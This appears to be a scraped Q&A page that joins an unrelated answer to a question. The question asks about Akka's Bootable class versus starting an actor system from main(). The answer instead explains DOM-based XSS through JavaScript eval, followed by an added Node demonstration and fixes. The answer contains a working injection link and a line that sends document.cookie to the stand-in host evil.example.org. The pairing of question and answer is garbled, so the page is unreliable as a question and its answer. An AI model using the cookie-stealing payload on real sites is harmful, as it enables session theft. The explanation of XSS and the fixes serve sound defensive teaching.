Akka - when should I use the Bootable class

In Akka, I can initialize an actor system from the main(), like this:

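import akka.actor.ActorSystem
import com.typesafe.config.ConfigFactory

object HostManagerApp {
  def main(args: Array[String]): Unit = {
    // Create the actor system "Foo" from the "Bar" section of the loaded configuration
    val system = ActorSystem("Foo", ConfigFactory.load.getConfig("Bar"))
  }
}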

Alternatively, I can do the same from a class that extends Bootable. As mentioned in the docs, this also allows me to start the app from the command line. What's the difference between the two approaches?


Source: https://stackoverflow.com/questions/11527769
Updated: 2022-11-30 07:11

Best answer

Any malicious user can turn on chrome debugger for example, and modify javascript code that is being executed. So he can put his own functions to be executed etc.

Yes, a user can "attack" their own client-side session using JavaScript by using developer tools.

However, the difference between eval and developer tools is that eval may execute things in shareable links. The attacker could send their victim a link, which exploits the code evaluation function.

Take this code:

<script>

eval('alert("Your query string was ' + unescape(document.location.search) + '");');

</script>

Now if the query string is ?foo you simply get an alert dialog stating the following: Your query string was ?foo

Now say Chuck sends Bob an email with the subject "Look at this great link!".

The link is constructed as follows:

http://www.example.com/page.htm?hello%22);alert(document.cookie+%22, where www.example.com is your website.

This modifies the code that is executed by eval() to

alert("Your query string was hello");
alert(document.cookie+"");

(New lines added by me for clarity). This will show an alert box displaying all the non httpOnly cookies.

Take this to the next stage and the attacker could construct an image link to send the session cookie to themselves

new Image().src="https://evil.example.org/?cookie=" + escape(document.cookie)

This is known as a Cross-Site Scripting (XSS) attack. In fact, the type is a DOM based XSS, to be specific.

Is there such thing as "secure javascript code" in general?

Yes, code that's secure against XSS could be considered "secure JavaScript code" - it protects the current user from cross-domain attacks. However, server-side code that "trusts" that the current end-user won't modify JavaScript code or variables to their own advantage using developer tools isn't secure.

Therefore secure JavaScript code is such code that will protect the current user only.
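
The behaviour described in the answer above, reproduced under Node as an added example that is not part of the original answer. It assumes a stubbed alert and document with a constructed cookie value, and uses new Function in place of the page's eval() so the stubs can be injected; the helper names are hypothetical.

```javascript
// Added example: runs under Node with stubbed alert/document (constructed values).
// new Function stands in for the page's eval() so the stubs can be injected.
function runWithStubs(source, cookie) {
  const alerts = [];
  const fakeDocument = { cookie };                 // constructed cookie value
  const fakeAlert = (msg) => alerts.push(String(msg));
  new Function("alert", "document", source)(fakeAlert, fakeDocument);
  return alerts;                                   // every alert() the code made
}

// Same string building as the snippet in the answer: the query string becomes code.
function vulnerableSource(search) {
  return 'alert("Your query string was ' + unescape(search) + '");';
}

// decodeURIComponent throws on malformed escapes such as "%zz"; keep the raw text then.
function decode(search) {
  try { return decodeURIComponent(search); } catch { return search; }
}

// If code generation cannot be avoided, embed the value as a quoted string literal.
function quotedSource(search) {
  return "alert(" + JSON.stringify("Your query string was " + decode(search)) + ");";
}

// Preferred fix: no code evaluation at all; the query string is only ever data.
function safeAlerts(search) {
  return ["Your query string was " + decode(search)];
}

const benign = "?foo";
const fromLink = "?hello%22);alert(document.cookie+%22"; // query string of the link in the answer
const cookie = "session=CONSTRUCTED";

console.log(runWithStubs(vulnerableSource(benign), cookie));   // one alert
console.log(runWithStubs(vulnerableSource(fromLink), cookie)); // two alerts, second is the cookie
console.log(runWithStubs(quotedSource(fromLink), cookie));     // one alert, input shown as text
console.log(safeAlerts(fromLink));                             // one alert, input shown as text
```

With the concatenated source the input changes how many statements run; with the quoted literal or with no evaluation at all, the same input only changes the text that is displayed.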
